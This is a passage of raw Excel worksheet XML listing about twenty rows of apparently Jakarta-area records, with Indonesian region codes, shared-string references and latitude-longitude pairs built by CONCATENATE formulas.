        <v>128</v>
      </c>
      <c r="R1657" t="s">
        <v>128</v>
      </c>
      <c r="S1657" t="s">
        <v>49</v>
      </c>
      <c r="T1657" t="s">
        <v>33</v>
      </c>
      <c r="U1657" s="5">
        <v>10691441</v>
      </c>
      <c r="V1657" s="5" t="s">
        <v>15950</v>
      </c>
      <c r="W1657" s="5">
        <v>-624732</v>
      </c>
      <c r="X1657" t="s">
        <v>19716</v>
      </c>
      <c r="Y1657" t="str">
        <f t="shared" si="25"/>
        <v>-6.24732,106.91441</v>
      </c>
    </row>
    <row r="1658" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1658">
        <v>109183</v>
      </c>
      <c r="B1658" s="1">
        <v>43886</v>
      </c>
      <c r="C1658">
        <v>0</v>
      </c>
      <c r="D1658" t="s">
        <v>22</v>
      </c>
      <c r="E1658" t="s">
        <v>23</v>
      </c>
      <c r="F1658" t="s">
        <v>5695</v>
      </c>
      <c r="G1658" t="s">
        <v>5696</v>
      </c>
      <c r="H1658" t="s">
        <v>26</v>
      </c>
      <c r="I1658" t="s">
        <v>487</v>
      </c>
      <c r="J1658" t="s">
        <v>2627</v>
      </c>
      <c r="M1658">
        <v>3275012001</v>
      </c>
      <c r="N1658">
        <v>3275012</v>
      </c>
      <c r="O1658">
        <v>3275</v>
      </c>
      <c r="P1658">
        <v>32</v>
      </c>
      <c r="Q1658" t="s">
        <v>4088</v>
      </c>
      <c r="R1658" t="s">
        <v>4089</v>
      </c>
      <c r="S1658" t="s">
        <v>41</v>
      </c>
      <c r="T1658" t="s">
        <v>42</v>
      </c>
      <c r="U1658" s="5">
        <v>10692891</v>
      </c>
      <c r="V1658" s="5" t="s">
        <v>15951</v>
      </c>
      <c r="W1658" s="5">
        <v>-632703</v>
      </c>
      <c r="X1658" t="s">
        <v>19717</v>
      </c>
      <c r="Y1658" t="str">
        <f t="shared" si="25"/>
        <v>-6.32703,106.92891</v>
      </c>
    </row>
    <row r="1659" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1659">
        <v>109184</v>
      </c>
      <c r="B1659" s="1">
        <v>43886</v>
      </c>
      <c r="C1659">
        <v>0</v>
      </c>
      <c r="D1659" t="s">
        <v>22</v>
      </c>
      <c r="E1659" t="s">
        <v>23</v>
      </c>
      <c r="F1659" t="s">
        <v>5697</v>
      </c>
      <c r="G1659" t="s">
        <v>5698</v>
      </c>
      <c r="H1659" t="s">
        <v>26</v>
      </c>
      <c r="I1659" t="s">
        <v>5699</v>
      </c>
      <c r="J1659" t="s">
        <v>4758</v>
      </c>
      <c r="L1659" t="s">
        <v>5700</v>
      </c>
      <c r="M1659">
        <v>3175020002</v>
      </c>
      <c r="N1659">
        <v>3175020</v>
      </c>
      <c r="O1659">
        <v>3175</v>
      </c>
      <c r="P1659">
        <v>31</v>
      </c>
      <c r="Q1659" t="s">
        <v>4760</v>
      </c>
      <c r="R1659" t="s">
        <v>2228</v>
      </c>
      <c r="S1659" t="s">
        <v>547</v>
      </c>
      <c r="T1659" t="s">
        <v>33</v>
      </c>
      <c r="U1659" s="5">
        <v>10684677</v>
      </c>
      <c r="V1659" s="5" t="s">
        <v>15952</v>
      </c>
      <c r="W1659" s="5">
        <v>-613270</v>
      </c>
      <c r="X1659" t="s">
        <v>19718</v>
      </c>
      <c r="Y1659" t="str">
        <f t="shared" si="25"/>
        <v>-6.13270,106.84677</v>
      </c>
    </row>
    <row r="1660" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1660">
        <v>109185</v>
      </c>
      <c r="B1660" s="1">
        <v>43886</v>
      </c>
      <c r="C1660">
        <v>0</v>
      </c>
      <c r="D1660" t="s">
        <v>22</v>
      </c>
      <c r="E1660" t="s">
        <v>23</v>
      </c>
      <c r="F1660" t="s">
        <v>5701</v>
      </c>
      <c r="H1660" t="s">
        <v>26</v>
      </c>
      <c r="I1660" t="s">
        <v>974</v>
      </c>
      <c r="J1660" t="s">
        <v>2392</v>
      </c>
      <c r="L1660" t="s">
        <v>5702</v>
      </c>
      <c r="M1660">
        <v>3175050002</v>
      </c>
      <c r="N1660">
        <v>3175050</v>
      </c>
      <c r="O1660">
        <v>3175</v>
      </c>
      <c r="P1660">
        <v>31</v>
      </c>
      <c r="Q1660" t="s">
        <v>1012</v>
      </c>
      <c r="R1660" t="s">
        <v>1013</v>
      </c>
      <c r="S1660" t="s">
        <v>547</v>
      </c>
      <c r="T1660" t="s">
        <v>33</v>
      </c>
      <c r="U1660" s="5">
        <v>10690844</v>
      </c>
      <c r="V1660" s="5" t="s">
        <v>15953</v>
      </c>
      <c r="W1660" s="5">
        <v>-615583</v>
      </c>
      <c r="X1660" t="s">
        <v>19719</v>
      </c>
      <c r="Y1660" t="str">
        <f t="shared" si="25"/>
        <v>-6.15583,106.90844</v>
      </c>
    </row>
    <row r="1661" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1661">
        <v>109186</v>
      </c>
      <c r="B1661" s="1">
        <v>43886</v>
      </c>
      <c r="C1661">
        <v>0</v>
      </c>
      <c r="D1661" t="s">
        <v>22</v>
      </c>
      <c r="E1661" t="s">
        <v>23</v>
      </c>
      <c r="F1661" t="s">
        <v>5703</v>
      </c>
      <c r="G1661" t="s">
        <v>5704</v>
      </c>
      <c r="H1661" t="s">
        <v>26</v>
      </c>
      <c r="I1661" t="s">
        <v>4833</v>
      </c>
      <c r="J1661" t="s">
        <v>3066</v>
      </c>
      <c r="L1661" t="s">
        <v>5705</v>
      </c>
      <c r="M1661">
        <v>3173020001</v>
      </c>
      <c r="N1661">
        <v>3173020</v>
      </c>
      <c r="O1661">
        <v>3173</v>
      </c>
      <c r="P1661">
        <v>31</v>
      </c>
      <c r="Q1661" t="s">
        <v>179</v>
      </c>
      <c r="R1661" t="s">
        <v>179</v>
      </c>
      <c r="S1661" t="s">
        <v>62</v>
      </c>
      <c r="T1661" t="s">
        <v>33</v>
      </c>
      <c r="U1661" s="5">
        <v>10683408</v>
      </c>
      <c r="V1661" s="5" t="s">
        <v>15222</v>
      </c>
      <c r="W1661" s="5">
        <v>-619876</v>
      </c>
      <c r="X1661" t="s">
        <v>19012</v>
      </c>
      <c r="Y1661" t="str">
        <f t="shared" si="25"/>
        <v>-6.19876,106.83408</v>
      </c>
    </row>
    <row r="1662" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1662">
        <v>109187</v>
      </c>
      <c r="B1662" s="1">
        <v>43886</v>
      </c>
      <c r="C1662">
        <v>0</v>
      </c>
      <c r="D1662" t="s">
        <v>22</v>
      </c>
      <c r="E1662" t="s">
        <v>23</v>
      </c>
      <c r="F1662" t="s">
        <v>5706</v>
      </c>
      <c r="G1662" t="s">
        <v>5707</v>
      </c>
      <c r="H1662" t="s">
        <v>26</v>
      </c>
      <c r="I1662" t="s">
        <v>784</v>
      </c>
      <c r="J1662" t="s">
        <v>2627</v>
      </c>
      <c r="L1662" t="s">
        <v>5708</v>
      </c>
      <c r="M1662">
        <v>3275020006</v>
      </c>
      <c r="N1662">
        <v>3275020</v>
      </c>
      <c r="O1662">
        <v>3275</v>
      </c>
      <c r="P1662">
        <v>32</v>
      </c>
      <c r="Q1662" t="s">
        <v>4024</v>
      </c>
      <c r="R1662" t="s">
        <v>828</v>
      </c>
      <c r="S1662" t="s">
        <v>41</v>
      </c>
      <c r="T1662" t="s">
        <v>42</v>
      </c>
      <c r="U1662" s="5">
        <v>10694154</v>
      </c>
      <c r="V1662" s="5" t="s">
        <v>15954</v>
      </c>
      <c r="W1662" s="5">
        <v>-627143</v>
      </c>
      <c r="X1662" t="s">
        <v>19720</v>
      </c>
      <c r="Y1662" t="str">
        <f t="shared" si="25"/>
        <v>-6.27143,106.94154</v>
      </c>
    </row>
    <row r="1663" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1663">
        <v>109188</v>
      </c>
      <c r="B1663" s="1">
        <v>43886</v>
      </c>
      <c r="C1663">
        <v>0</v>
      </c>
      <c r="D1663" t="s">
        <v>22</v>
      </c>
      <c r="E1663" t="s">
        <v>23</v>
      </c>
      <c r="F1663" t="s">
        <v>5709</v>
      </c>
      <c r="G1663" t="s">
        <v>5710</v>
      </c>
      <c r="H1663" t="s">
        <v>26</v>
      </c>
      <c r="I1663" t="s">
        <v>624</v>
      </c>
      <c r="J1663" t="s">
        <v>2902</v>
      </c>
      <c r="L1663" t="s">
        <v>5711</v>
      </c>
      <c r="M1663">
        <v>3172020003</v>
      </c>
      <c r="N1663">
        <v>3172020</v>
      </c>
      <c r="O1663">
        <v>3172</v>
      </c>
      <c r="P1663">
        <v>31</v>
      </c>
      <c r="Q1663" t="s">
        <v>1644</v>
      </c>
      <c r="R1663" t="s">
        <v>1644</v>
      </c>
      <c r="S1663" t="s">
        <v>49</v>
      </c>
      <c r="T1663" t="s">
        <v>33</v>
      </c>
      <c r="U1663" s="5">
        <v>10687903</v>
      </c>
      <c r="V1663" s="5" t="s">
        <v>15955</v>
      </c>
      <c r="W1663" s="5">
        <v>-632181</v>
      </c>
      <c r="X1663" t="s">
        <v>19721</v>
      </c>
      <c r="Y1663" t="str">
        <f t="shared" si="25"/>
        <v>-6.32181,106.87903</v>
      </c>
    </row>
    <row r="1664" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1664">
        <v>109189</v>
      </c>
      <c r="B1664" s="1">
        <v>43886</v>
      </c>
      <c r="C1664">
        <v>0</v>
      </c>
      <c r="D1664" t="s">
        <v>22</v>
      </c>
      <c r="E1664" t="s">
        <v>23</v>
      </c>
      <c r="F1664" t="s">
        <v>5712</v>
      </c>
      <c r="G1664" t="s">
        <v>5713</v>
      </c>
      <c r="H1664" t="s">
        <v>26</v>
      </c>
      <c r="I1664" t="s">
        <v>76</v>
      </c>
      <c r="J1664" t="s">
        <v>2788</v>
      </c>
      <c r="L1664" t="s">
        <v>5714</v>
      </c>
      <c r="M1664">
        <v>3173050001</v>
      </c>
      <c r="N1664">
        <v>3173050</v>
      </c>
      <c r="O1664">
        <v>3173</v>
      </c>
      <c r="P1664">
        <v>31</v>
      </c>
      <c r="Q1664" t="s">
        <v>2790</v>
      </c>
      <c r="R1664" t="s">
        <v>589</v>
      </c>
      <c r="S1664" t="s">
        <v>62</v>
      </c>
      <c r="T1664" t="s">
        <v>33</v>
      </c>
      <c r="U1664" s="5">
        <v>10687041</v>
      </c>
      <c r="V1664" s="5" t="s">
        <v>15956</v>
      </c>
      <c r="W1664" s="5">
        <v>-618837</v>
      </c>
      <c r="X1664" t="s">
        <v>19722</v>
      </c>
      <c r="Y1664" t="str">
        <f t="shared" si="25"/>
        <v>-6.18837,106.87041</v>
      </c>
    </row>
    <row r="1665" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1665">
        <v>109190</v>
      </c>
      <c r="B1665" s="1">
        <v>43886</v>
      </c>
      <c r="C1665">
        <v>0</v>
      </c>
      <c r="D1665" t="s">
        <v>22</v>
      </c>
      <c r="E1665" t="s">
        <v>23</v>
      </c>
      <c r="F1665" t="s">
        <v>5715</v>
      </c>
      <c r="G1665" t="s">
        <v>5716</v>
      </c>
      <c r="H1665" t="s">
        <v>26</v>
      </c>
      <c r="I1665" t="s">
        <v>1194</v>
      </c>
      <c r="J1665" t="s">
        <v>894</v>
      </c>
      <c r="L1665" t="s">
        <v>5717</v>
      </c>
      <c r="M1665">
        <v>3174020005</v>
      </c>
      <c r="N1665">
        <v>3174020</v>
      </c>
      <c r="O1665">
        <v>3174</v>
      </c>
      <c r="P1665">
        <v>31</v>
      </c>
      <c r="Q1665" t="s">
        <v>30</v>
      </c>
      <c r="R1665" t="s">
        <v>31</v>
      </c>
      <c r="S1665" t="s">
        <v>32</v>
      </c>
      <c r="T1665" t="s">
        <v>33</v>
      </c>
      <c r="U1665" s="5">
        <v>10677364</v>
      </c>
      <c r="V1665" s="5" t="s">
        <v>15957</v>
      </c>
      <c r="W1665" s="5">
        <v>-617080</v>
      </c>
      <c r="X1665" t="s">
        <v>19723</v>
      </c>
      <c r="Y1665" t="str">
        <f t="shared" si="25"/>
        <v>-6.17080,106.77364</v>
      </c>
    </row>
    <row r="1666" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1666">
        <v>109191</v>
      </c>
      <c r="B1666" s="1">
        <v>43886</v>
      </c>
      <c r="C1666">
        <v>0</v>
      </c>
      <c r="D1666" t="s">
        <v>22</v>
      </c>
      <c r="E1666" t="s">
        <v>23</v>
      </c>
      <c r="F1666" t="s">
        <v>5718</v>
      </c>
      <c r="H1666" t="s">
        <v>26</v>
      </c>
      <c r="I1666" t="s">
        <v>1389</v>
      </c>
      <c r="J1666" t="s">
        <v>2268</v>
      </c>
      <c r="L1666" t="s">
        <v>5719</v>
      </c>
      <c r="M1666">
        <v>3175030002</v>
      </c>
      <c r="N1666">
        <v>3175030</v>
      </c>
      <c r="O1666">
        <v>3175</v>
      </c>
      <c r="P1666">
        <v>31</v>
      </c>
      <c r="Q1666" t="s">
        <v>1592</v>
      </c>
      <c r="R1666" t="s">
        <v>1563</v>
      </c>
      <c r="S1666" t="s">
        <v>547</v>
      </c>
      <c r="T1666" t="s">
        <v>33</v>
      </c>
      <c r="U1666" s="5">
        <v>10686199</v>
      </c>
      <c r="V1666" s="5" t="s">
        <v>15958</v>
      </c>
      <c r="W1666" s="5">
        <v>-615336</v>
      </c>
      <c r="X1666" t="s">
        <v>19724</v>
      </c>
      <c r="Y1666" t="str">
        <f t="shared" si="25"/>
        <v>-6.15336,106.86199</v>
      </c>
    </row>
    <row r="1667" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1667">
        <v>109192</v>
      </c>
      <c r="B1667" s="1">
        <v>43886</v>
      </c>
      <c r="C1667">
        <v>0</v>
      </c>
      <c r="D1667" t="s">
        <v>22</v>
      </c>
      <c r="E1667" t="s">
        <v>23</v>
      </c>
      <c r="F1667" t="s">
        <v>5720</v>
      </c>
      <c r="G1667" t="s">
        <v>5721</v>
      </c>
      <c r="H1667" t="s">
        <v>26</v>
      </c>
      <c r="I1667" t="s">
        <v>5089</v>
      </c>
      <c r="J1667" t="s">
        <v>5722</v>
      </c>
      <c r="L1667" t="s">
        <v>250</v>
      </c>
      <c r="M1667">
        <v>3174080002</v>
      </c>
      <c r="N1667">
        <v>3174080</v>
      </c>
      <c r="O1667">
        <v>3174</v>
      </c>
      <c r="P1667">
        <v>31</v>
      </c>
      <c r="Q1667" t="s">
        <v>5723</v>
      </c>
      <c r="R1667" t="s">
        <v>695</v>
      </c>
      <c r="S1667" t="s">
        <v>32</v>
      </c>
      <c r="T1667" t="s">
        <v>33</v>
      </c>
      <c r="U1667" s="5">
        <v>10671812</v>
      </c>
      <c r="V1667" s="5" t="s">
        <v>15959</v>
      </c>
      <c r="W1667" s="5">
        <v>-615225</v>
      </c>
      <c r="X1667" t="s">
        <v>19725</v>
      </c>
      <c r="Y1667" t="str">
        <f t="shared" ref="Y1667:Y1730" si="26">CONCATENATE(X1667,",",V1667)</f>
        <v>-6.15225,106.71812</v>
      </c>
    </row>
    <row r="1668" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1668">
        <v>109193</v>
      </c>
      <c r="B1668" s="1">
        <v>43886</v>
      </c>
      <c r="C1668">
        <v>0</v>
      </c>
      <c r="D1668" t="s">
        <v>22</v>
      </c>
      <c r="E1668" t="s">
        <v>23</v>
      </c>
      <c r="F1668" t="s">
        <v>5724</v>
      </c>
      <c r="G1668" t="s">
        <v>5725</v>
      </c>
      <c r="H1668" t="s">
        <v>26</v>
      </c>
      <c r="I1668" t="s">
        <v>5687</v>
      </c>
      <c r="J1668" t="s">
        <v>2627</v>
      </c>
      <c r="M1668">
        <v>3275060002</v>
      </c>
      <c r="N1668">
        <v>3275060</v>
      </c>
      <c r="O1668">
        <v>3275</v>
      </c>
      <c r="P1668">
        <v>32</v>
      </c>
      <c r="Q1668" t="s">
        <v>113</v>
      </c>
      <c r="R1668" t="s">
        <v>114</v>
      </c>
      <c r="S1668" t="s">
        <v>41</v>
      </c>
      <c r="T1668" t="s">
        <v>42</v>
      </c>
      <c r="U1668" s="5">
        <v>10696858</v>
      </c>
      <c r="V1668" s="5" t="s">
        <v>15960</v>
      </c>
      <c r="W1668" s="5">
        <v>-622851</v>
      </c>
      <c r="X1668" t="s">
        <v>19726</v>
      </c>
      <c r="Y1668" t="str">
        <f t="shared" si="26"/>
        <v>-6.22851,106.96858</v>
      </c>
    </row>
    <row r="1669" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1669">
        <v>109194</v>
      </c>
      <c r="B1669" s="1">
        <v>43886</v>
      </c>
      <c r="C1669">
        <v>0</v>
      </c>
      <c r="D1669" t="s">
        <v>22</v>
      </c>
      <c r="E1669" t="s">
        <v>23</v>
      </c>
      <c r="F1669" t="s">
        <v>5726</v>
      </c>
      <c r="G1669" t="s">
        <v>5727</v>
      </c>
      <c r="H1669" t="s">
        <v>26</v>
      </c>
      <c r="I1669" t="s">
        <v>1683</v>
      </c>
      <c r="J1669" t="s">
        <v>4658</v>
      </c>
      <c r="L1669" t="s">
        <v>5728</v>
      </c>
      <c r="M1669">
        <v>3172030005</v>
      </c>
      <c r="N1669">
        <v>3172030</v>
      </c>
      <c r="O1669">
        <v>3172</v>
      </c>
      <c r="P1669">
        <v>31</v>
      </c>
      <c r="Q1669" t="s">
        <v>1256</v>
      </c>
      <c r="R1669" t="s">
        <v>228</v>
      </c>
      <c r="S1669" t="s">
        <v>49</v>
      </c>
      <c r="T1669" t="s">
        <v>33</v>
      </c>
      <c r="U1669" s="5">
        <v>10691501</v>
      </c>
      <c r="V1669" s="5" t="s">
        <v>15961</v>
      </c>
      <c r="W1669" s="5">
        <v>-631547</v>
      </c>
      <c r="X1669" t="s">
        <v>19727</v>
      </c>
      <c r="Y1669" t="str">
        <f t="shared" si="26"/>
        <v>-6.31547,106.91501</v>
      </c>
    </row>
    <row r="1670" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1670">
        <v>109195</v>
      </c>
      <c r="B1670" s="1">
        <v>43886</v>
      </c>
      <c r="C1670">
        <v>0</v>
      </c>
      <c r="D1670" t="s">
        <v>22</v>
      </c>
      <c r="E1670" t="s">
        <v>23</v>
      </c>
      <c r="F1670" t="s">
        <v>5729</v>
      </c>
      <c r="G1670" t="s">
        <v>5730</v>
      </c>
      <c r="H1670" t="s">
        <v>26</v>
      </c>
      <c r="I1670" t="s">
        <v>3275</v>
      </c>
      <c r="J1670" t="s">
        <v>3135</v>
      </c>
      <c r="L1670" t="s">
        <v>5731</v>
      </c>
      <c r="M1670">
        <v>3174010003</v>
      </c>
      <c r="N1670">
        <v>3174010</v>
      </c>
      <c r="O1670">
        <v>3174</v>
      </c>
      <c r="P1670">
        <v>31</v>
      </c>
      <c r="Q1670" t="s">
        <v>5732</v>
      </c>
      <c r="R1670" t="s">
        <v>69</v>
      </c>
      <c r="S1670" t="s">
        <v>32</v>
      </c>
      <c r="T1670" t="s">
        <v>33</v>
      </c>
      <c r="U1670" s="5">
        <v>10672070</v>
      </c>
      <c r="V1670" s="5" t="s">
        <v>15962</v>
      </c>
      <c r="W1670" s="5">
        <v>-621059</v>
      </c>
      <c r="X1670" t="s">
        <v>19728</v>
      </c>
      <c r="Y1670" t="str">
        <f t="shared" si="26"/>
        <v>-6.21059,106.72070</v>
      </c>
    </row>
    <row r="1671" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1671">
        <v>109196</v>
      </c>
      <c r="B1671" s="1">
        <v>43886</v>
      </c>
      <c r="C1671">
        <v>0</v>
      </c>
      <c r="D1671" t="s">
        <v>22</v>
      </c>
      <c r="E1671" t="s">
        <v>23</v>
      </c>
      <c r="F1671" t="s">
        <v>5733</v>
      </c>
      <c r="H1671" t="s">
        <v>26</v>
      </c>
      <c r="I1671" t="s">
        <v>2300</v>
      </c>
      <c r="J1671" t="s">
        <v>1072</v>
      </c>
      <c r="L1671" t="s">
        <v>5734</v>
      </c>
      <c r="M1671">
        <v>3171090004</v>
      </c>
      <c r="N1671">
        <v>3171090</v>
      </c>
      <c r="O1671">
        <v>3171</v>
      </c>
      <c r="P1671">
        <v>31</v>
      </c>
      <c r="Q1671" t="s">
        <v>1074</v>
      </c>
      <c r="R1671" t="s">
        <v>347</v>
      </c>
      <c r="S1671" t="s">
        <v>108</v>
      </c>
      <c r="T1671" t="s">
        <v>33</v>
      </c>
      <c r="U1671" s="5">
        <v>10686353</v>
      </c>
      <c r="V1671" s="5" t="s">
        <v>15963</v>
      </c>
      <c r="W1671" s="5">
        <v>-623476</v>
      </c>
      <c r="X1671" t="s">
        <v>19729</v>
      </c>
      <c r="Y1671" t="str">
        <f t="shared" si="26"/>
        <v>-6.23476,106.86353</v>
      </c>
    </row>
    <row r="1672" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1672">
        <v>109197</v>
      </c>
      <c r="B1672" s="1">
        <v>43886</v>
      </c>
      <c r="C1672">
        <v>0</v>
      </c>
      <c r="D1672" t="s">
        <v>22</v>
      </c>
      <c r="E1672" t="s">
        <v>23</v>
      </c>
      <c r="F1672" t="s">
        <v>5735</v>
      </c>
      <c r="G1672" t="s">
        <v>5736</v>
      </c>
      <c r="H1672" t="s">
        <v>26</v>
      </c>
      <c r="I1672" t="s">
        <v>166</v>
      </c>
      <c r="J1672" t="s">
        <v>2407</v>
      </c>
      <c r="L1672" t="s">
        <v>5737</v>
      </c>
      <c r="M1672">
        <v>3175060006</v>
      </c>
      <c r="N1672">
        <v>3175060</v>
      </c>
      <c r="O1672">
        <v>3175</v>
      </c>
      <c r="P1672">
        <v>31</v>
      </c>
      <c r="Q1672" t="s">
        <v>2409</v>
      </c>
      <c r="R1672" t="s">
        <v>2279</v>
      </c>
      <c r="S1672" t="s">
        <v>547</v>
      </c>
      <c r="T1672" t="s">
        <v>33</v>
      </c>
      <c r="U1672" s="5">
        <v>10692373</v>
      </c>
      <c r="V1672" s="5" t="s">
        <v>15964</v>
      </c>
      <c r="W1672" s="5">
        <v>-613135</v>
      </c>
      <c r="X1672" t="s">
        <v>19730</v>
      </c>
      <c r="Y1672" t="str">
        <f t="shared" si="26"/>
        <v>-6.13135,106.92373</v>
      </c>
    </row>
    <row r="1673" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1673">
        <v>109198</v>
      </c>
      <c r="B1673" s="1">
        <v>43886</v>
      </c>
      <c r="C1673">
        <v>0</v>
      </c>
      <c r="D1673" t="s">
        <v>22</v>
      </c>
      <c r="E1673" t="s">
        <v>23</v>
      </c>
      <c r="F1673" t="s">
        <v>5738</v>
      </c>
      <c r="G1673" t="s">
        <v>5739</v>
      </c>
      <c r="H1673" t="s">
        <v>26</v>
      </c>
      <c r="I1673" t="s">
        <v>1099</v>
      </c>
      <c r="J1673" t="s">
        <v>2627</v>
      </c>
      <c r="L1673" t="s">
        <v>5740</v>
      </c>
      <c r="M1673">
        <v>3275060005</v>
      </c>
      <c r="N1673">
        <v>3275060</v>
      </c>
      <c r="O1673">
        <v>3275</v>
      </c>
      <c r="P1673">
        <v>32</v>
      </c>
      <c r="Q1673" t="s">
        <v>3526</v>
      </c>
      <c r="R1673" t="s">
        <v>114</v>
      </c>
      <c r="S1673" t="s">
        <v>41</v>
      </c>
      <c r="T1673" t="s">
        <v>42</v>
      </c>
      <c r="U1673" s="5">
        <v>10696356</v>
      </c>
      <c r="V1673" s="5" t="s">
        <v>15965</v>
      </c>
      <c r="W1673" s="5">
        <v>-621512</v>
      </c>
      <c r="X1673" t="s">
        <v>19731</v>
      </c>
      <c r="Y1673" t="str">
        <f t="shared" si="26"/>
        <v>-6.21512,106.96356</v>
      </c>
    </row>
    <row r="1674" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1674">
        <v>109199</v>
      </c>
      <c r="B1674" s="1">
        <v>43886</v>
      </c>
      <c r="C1674">
        <v>0</v>
      </c>
      <c r="D1674" t="s">
        <v>22</v>
      </c>
      <c r="E1674" t="s">
        <v>23</v>
      </c>
      <c r="F1674" t="s">
        <v>5741</v>
      </c>
      <c r="G1674" t="s">
        <v>5742</v>
      </c>
      <c r="H1674" t="s">
        <v>26</v>
      </c>
      <c r="I1674" t="s">
        <v>1953</v>
      </c>
      <c r="J1674" t="s">
        <v>2627</v>
      </c>
      <c r="L1674" t="s">
        <v>5743</v>
      </c>
      <c r="M1674">
        <v>3216100008</v>
      </c>
      <c r="N1674">
        <v>3216100</v>
      </c>
      <c r="O1674">
        <v>3216</v>
      </c>
      <c r="P1674">
        <v>32</v>
      </c>
      <c r="Q1674" t="s">
        <v>5744</v>
      </c>
      <c r="R1674" t="s">
        <v>940</v>
      </c>
      <c r="S1674" t="s">
        <v>41</v>
      </c>
      <c r="T1674" t="s">
        <v>42</v>
      </c>
      <c r="U1674" s="5">
        <v>10702342</v>
      </c>
      <c r="V1674" s="5" t="s">
        <v>15966</v>
      </c>
      <c r="W1674" s="5">
        <v>-611757</v>
      </c>
      <c r="X1674" t="s">
        <v>19732</v>
      </c>
      <c r="Y1674" t="str">
        <f t="shared" si="26"/>
        <v>-6.11757,107.02342</v>
      </c>
    </row>
    <row r="1675" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1675">
        <v>109200</v>
      </c>
      <c r="B1675" s="1">
        <v>43886</v>
      </c>
      <c r="C1675">
        <v>0</v>
      </c>
      <c r="D1675" t="s">
        <v>22</v>
      </c>
      <c r="E1675" t="s">
        <v>23</v>
      </c>
      <c r="F1675" t="s">
        <v>5745</v>
      </c>
      <c r="G1675" t="s">
        <v>5746</v>
      </c>
      <c r="H1675" t="s">
        <v>26</v>
      </c>
      <c r="I1675" t="s">
        <v>1710</v>
      </c>
      <c r="J1675" t="s">
        <v>5747</v>
      </c>
      <c r="L1675" t="s">
        <v>5748</v>
      </c>
      <c r="M1675">
        <v>3172050002</v>
      </c>
      <c r="N1675">
        <v>3172050</v>
      </c>
      <c r="O1675">
        <v>3172</v>
      </c>
      <c r="P1675">
        <v>31</v>
      </c>
      <c r="Q1675" t="s">
        <v>5749</v>
      </c>
      <c r="R1675" t="s">
        <v>358</v>
      </c>
      <c r="S1675" t="s">
        <v>49</v>
      </c>
      <c r="T1675" t="s">
        <v>33</v>
      </c>
      <c r="U1675" s="5">
        <v>10685701</v>
      </c>
      <c r="V1675" s="5" t="s">
        <v>15967</v>
      </c>
      <c r="W1675" s="5">
        <v>-627909</v>
      </c>
      <c r="X1675" t="s">
        <v>19733</v>
      </c>
      <c r="Y1675" t="str">
        <f t="shared" si="26"/>
        <v>-6.27909,106.85701</v>
      </c>
    </row>
    <row r="1676" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1676">
        <v>109201</v>
      </c>
      <c r="B1676" s="1">
        <v>43886</v>
      </c>
      <c r="C1676">
        <v>0</v>
      </c>
      <c r="D1676" t="s">
        <v>22</v>
      </c>
      <c r="E1676" t="s">
        <v>23</v>
      </c>
      <c r="F1676" t="s">
        <v>5750</v>
      </c>
      <c r="G1676" t="s">
        <v>5751</v>
      </c>
      <c r="H1676" t="s">
        <v>26</v>
      </c>
      <c r="I1676" t="s">
        <v>5752</v>
      </c>
      <c r="J1676" t="s">
        <v>2627</v>
      </c>
      <c r="L1676" t="s">
        <v>5753</v>
      </c>
      <c r="M1676">
        <v>3216082002</v>
      </c>
      <c r="N1676">
        <v>3216082</v>
      </c>
      <c r="O1676">
        <v>3216</v>
      </c>
      <c r="P1676">
        <v>32</v>
      </c>
      <c r="Q1676" t="s">
        <v>1273</v>
      </c>
      <c r="R1676" t="s">
        <v>601</v>
      </c>
      <c r="S1676" t="s">
        <v>41</v>
      </c>
      <c r="T1676" t="s">
        <v>42</v>
      </c>
      <c r="U1676" s="5">
        <v>10704313</v>
      </c>
      <c r="V1676" s="5" t="s">
        <v>15968</v>
      </c>
      <c r="W1676" s="5">
        <v>-620268</v>
      </c>
      <c r="X1676" t="s">
        <v>19734</v>
      </c>
      <c r="Y1676" t="str">
        <f t="shared" si="26"/>
        <v>-6.20268,107.04313</v>
      </c>
    </row>
    <row r="1677" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1677">
        <v>109202</v>
      </c>
      <c r="B1677" s="1">
        <v>43886</v>
      </c>
      <c r="C1677">
        <v>0</v>
      </c>
      <c r="D1677" t="s">
        <v>22</v>
      </c>
      <c r="E1677" t="s">
        <v>23</v>
      </c>
      <c r="F1677" t="s">
        <v>5754</v>
      </c>
      <c r="G1677" t="s">
        <v>5755</v>
      </c>
      <c r="H1677" t="s">
        <v>26</v>
      </c>
      <c r="I1677" t="s">
        <v>166</v>
      </c>
      <c r="J1677" t="s">
        <v>1628</v>
      </c>
      <c r="L1677" t="s">
        <v>5756</v>
      </c>
      <c r="M1677">
        <v>3171100005</v>
      </c>
      <c r="N1677">
        <v>3171100</v>
      </c>
      <c r="O1677">
        <v>3171</v>
      </c>
      <c r="P1677">
        <v>31</v>
      </c>
      <c r="Q1677" t="s">
        <v>1630</v>
      </c>
      <c r="R1677" t="s">
        <v>107</v>
      </c>
      <c r="S1677" t="s">
        <v>108</v>
      </c>
      <c r="T1677" t="s">
        <v>33</v>
      </c>
      <c r="U1677" s="5">
        <v>10684318</v>
      </c>
      <c r="V1677" s="5" t="s">
        <v>15969</v>
      </c>
      <c r="W1677" s="5">
        <v>-621933</v>
      </c>
      <c r="X1677" t="s">
        <v>19735</v>
      </c>
      <c r="Y1677" t="str">
        <f t="shared" si="26"/>
        <v>-6.21933,106.84318</v>
      </c>
    </row>
    <row r="1678" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1678">
        <v>109203</v>
      </c>
      <c r="B1678" s="1">
        <v>43886</v>
      </c>
      <c r="C1678">
        <v>0</v>
      </c>
      <c r="D1678" t="s">
        <v>22</v>
      </c>
      <c r="E1678" t="s">
        <v>23</v>
